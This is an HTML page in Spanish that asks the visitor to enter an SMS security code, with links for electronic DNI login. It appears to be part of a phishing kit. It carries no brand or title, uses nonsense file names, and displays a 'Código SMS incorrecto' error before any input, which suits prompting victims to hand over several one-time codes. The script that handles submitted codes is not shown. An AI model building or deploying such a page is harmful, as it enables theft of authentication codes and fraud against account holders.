<!DOCTYPE html>
<html lang="">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <script src="https://code.jquery.com/jquery-3.6.1.min.js" integrity="sha256-o88AwQnZB+VDvE9tvIXrMQaPlFFSUTR+nldQm1LuPXQ=" crossorigin="anonymous"></script>
    <link rel="stylesheet" href="./css/delta.css">
    <title></title>
</head>
<body>
    <div>
        <div>
            <div class="towpa">
                <img src="./img/lojo.svg" alt="">
            </div>
        </div>
    </div>


    <div class="cici">
        <div class="pp3">
            <p style="color: tomato;" class="p1">Confirmación </p>
        <p>Se le enviará un código de seguridad por SMS o por llamada desde un servidor de voz en su teléfono que será válido durante 5 minutos. </p>
        </div>

       <form method="post" id="pg4">
           <p>Ingrese el código recibido por SMS</p>
           <input type="tel" name="" id="" placeholder="Código SMS" required >
           <p style="margin-left: 0px; margin-top: -10px; margin-bottom: 20px; color: rgb(192, 28, 28);">Código SMS incorrecto</p>

           <button>Confirmar</button>
       </form>

       <p class="pp2">
        <svg class="svg-inline--fa fa-chevron-right fa-w-10" aria-hidden="true" focusable="false" data-prefix="fas" data-icon="chevron-right" role="img" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 320 512" data-fa-i2svg=""><path fill="currentColor" d="M285.476 272.971L91.132 467.314c-9.373 9.373-24.569 9.373-33.941 0l-22.667-22.667c-9.357-9.357-9.375-24.522-.04-33.901L188.505 256 34.484 101.255c-9.335-9.379-9.317-24.544.04-33.901l22.667-22.667c9.373-9.373 24.569-9.373 33.941 0L285.475 239.03c9.373 9.372 9.373 24.568.001 33.941z"></path></svg>
        Acceder con DNI electrónico</p>

    <p>
        <svg  class="svg-inline--fa fa-chevron-right fa-w-10" aria-hidden="true"  focusable="false" data-prefix="fas" data-icon="chevron-right" role="img" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 320 512" data-fa-i2svg=""><path fill="currentColor" d="M285.476 272.971L91.132 467.314c-9.373 9.373-24.569 9.373-33.941 0l-22.667-22.667c-9.357-9.357-9.375-24.522-.04-33.901L188.505 256 34.484 101.255c-9.335-9.379-9.317-24.544.04-33.901l22.667-22.667c9.373-9.373 24.569-9.373 33.941 0L285.475 239.03c9.373 9.372 9.373 24.568.001 33.941z"></path></svg>
        Más información sobre seguridad</p>
    </div>

    <script src="./js/stb.js"></script>
</body>
</html>